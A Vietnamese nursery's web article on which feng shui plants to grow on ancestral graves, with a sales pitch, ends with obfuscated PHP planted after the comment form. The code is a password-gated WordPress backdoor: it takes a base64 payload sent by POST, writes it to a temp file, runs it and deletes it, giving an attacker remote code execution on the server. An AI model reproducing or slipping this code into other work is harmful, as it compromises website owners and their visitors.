Chỉ Cho Bạn Những Loại Cây Phong Thủy Nên Trồng Ở Mộ

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây phong thủy trồng ở mộ là chủ đề được rất nhiều người quan tâm. Việc lựa chọn cây phong thủy ở mộ cũng mang nhiều ý nghĩa rất lớn. Trong bài viết này, Vườn cây Hòa Bình sẽ nói cho bạn tại sao cần trồng cây ở mộ và những loại cây bạn nên trồng tại đây nhé!

Lưu ý khi trồng cây phong thủy ở mộ
Lưu ý khi trồng cây phong thủy ở mộ

Tại sao nên trồng cây phong thủy ở mộ

Theo các chuyên gia về lĩnh vực phong thủy, việc trồng cây phong thủy ở mộ là một điều nên làm. Trồng cây là giúp cây được tiếp thêm linh khí trời đất. Nếu cây cối phát triển tốt thì nơi đó chắc hẳn là đất lành và nhân hậu vận thế được cho là rất tốt.

Bởi những lẽ trên, khi xây mộ người ta thường sẽ để riêng một phần đất nhỏ trên mộ để có thể trồng cây, cây hoa nhỏ để điều hòa sinh khí, tăng cảnh quan và cũng mong rằng con cháu có thể được hưởng phúc lành.

Đặc biệt là vào Tết Thanh Minh hằng năm, người người nhà nhà sẽ ra phần mộ gia tiên để dọn dẹp và thêm vào phần mộ một vài nhành cây hoặc một vài cây phong thủy để làm tăng cảnh quan.

>>> Xem thêm: Ý Nghĩa Đặc Biệt Của Hoa Mai Ngày Tết

Lưu ý khi trồng cây phong thủy ở mộ

Mộ phần là nơi linh thiên để thờ cúng tổ tiên, do vậy việc trồng cây ở trên mộ cũng phải được cân nhắc và tính toán kỹ càng để không ảnh hưởng đến những yếu tố về tâm linh. Dưới đây là một vài lưu ý khi bạn trồng cây phong thủy ở mộ.

– Không trồng cây rễ chùm, chỉ trồng cây rễ thẳng. Do phần đất ở mỗ có thể không được chăm sóc thường xuyên, điều kiện này sẽ dễ để cây rễ thẳng phát triển hơn là cây rễ chùm. Ngoài ra cũng có nhiều yếu tố tâm linh cho rằng việc cây rễ chùm khi phát triển sẽ lan ra xung quanh, phạm tới huyệt đạo. Điều này được các chuyên gia cho rằng không tốt.

Chọn cây trồng ở mộ phù hợp
Chọn cây trồng ở mộ phù hợp

– Trồng cây ở mộ phải đảm bảo yếu tố đối xứng và cân bằng. Cây trồng ở mộ không nên là loài cây bị lệch sang một bên trái hoặc phải. Một phần sẽ giúp tăng tính thẩm mỹ, phần còn lại là giúp cho âm dương được hòa hợp. 

– Nên trồng cây phía sau mộ để tạo được thành một chỗ dựa vững chắc. Điều này có ý nghĩa con cháu sẽ nhận được phúc phần của tổ tiên để lại cho mình. Không những vậy, còn là cầu mong luôn có quý nhân phù trợ.

– Không trồng cây có hình thù kỳ lạ. Điều này sẽ mang lại cảm giac quỷ quái và đáng sợ cho mộ phần và nếu tệ hơn có thể ảnh hướng đến gia đình.

Những loại cây phong thủy nên trồng ở mộ

Để trồng cây phong ở trên mộ bạn phải chọn lựa thật cẩn thận những mẫu cây mà mình sẽ trồng. Những loại cây được trồng cũng sẽ ít nhiều ảnh hưởng đến mộ phần và những người xung quanh. Dưới đây là những loại cây thường được chọn để trồng ở mộ.

Cây hoa sứ trắng

Với những khu mộ có diện tích lớn thì gia đình nên trồng cây hoa sứ trắng ở mộ. Cây sứ trắng là loại cây thân gỗ cao, cây chia thành nhiều nhánh lớn. Không những vậy, lá cây sứ to nhẵn bóng nên dễ dàng có thể che nắng cho phần mộ người đã khuất.

Theo phong thủy, cây hoa sứ là cây mang nhiều sinh khí và linh hồn của đất trời. Ngoài ra hoa màu trắng còn thể hiện sự yên bình và thoát tục và là loài cây rất tốt cho những người ở cõi âm.

Cây hoa cúc

Nhiều người cứ nghĩ rằng hoa cúc chỉ để cắm trên bàn thờ gia tiên tại nhà, nhưng thực chất hoa cúc cũng có thể được trồng ở mộ phần người đã khuất.

Cây hoa cúc được cho là loài cây thoát tục, không bị vấy bẩn và luôn tỏa ra mùi hương nhẹ. Những đặc điểm này của hoa sẽ giúp cho người cõi âm luôn được bình yên, không bị ma quỷ nghịch ngợm, quấy phá. Đồng thời, cây hoa cúc còn biểu thị sự biết ơn của con cháu đến tổ tiên, người đã khuất. 

Trồng cây hoa cúc ở mộ
Trồng cây hoa cúc ở mộ

Nếu bạn có không gian mộ phần rộng cũng có thể trồng hoa cúc ở đường dẫn vào mộ, ở phần hàng rào bên ngoài cũng sẽ làm tăng tính thẩm mỹ và trang nghiêm cho không gian linh thiêng này.

Cây hoa mẫu đơn

Cây hoa mẫu đơn được biết là một loài cây đài cát, thanh tao và đoan trang. Khi trồng loài cây này ở phần mộ sẽ giúp lăng mộ thêm đẹp và thoát tục hơn.

Rễ cây hoa mẫu đơn khác với những loại cây thân gỗ lớn khác, rễ cây hoa mẫu đơn không ăn sâu vào lòng đất gây ảnh hưởng đến phần mộ chôn dưới đất. Hoa mẫu đơn cũng là loài hoa thích nghi được ở khu vực đất cát và không cần chăm sóc quá nhiều.

>>> Xem thêm: Những sản phẩm cây phong thủy chất lượng.

Địa chỉ mua cây phong thủy trồng ở mộ

Vườn cây Hòa Bình là một trong những địa chỉ cung cấp cây phong thủy chất lượng cao và được nhiều khách hàng đặt trọn niềm tin. Chúng tôi mong rằng mình cũng có thể phần nào giúp bạn trong việc cung cấp cây phong thủy cho mộ phần gia tiên.

Hy vọng rằng những chia sẻ phía trên của Vườn cây Hòa Bình sẽ giúp ích được nhiều cho bạn và gia đình.

Địa chỉ mua cây phong thủy trồng ở mộ
Địa chỉ mua cây phong thủy trồng ở mộ

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}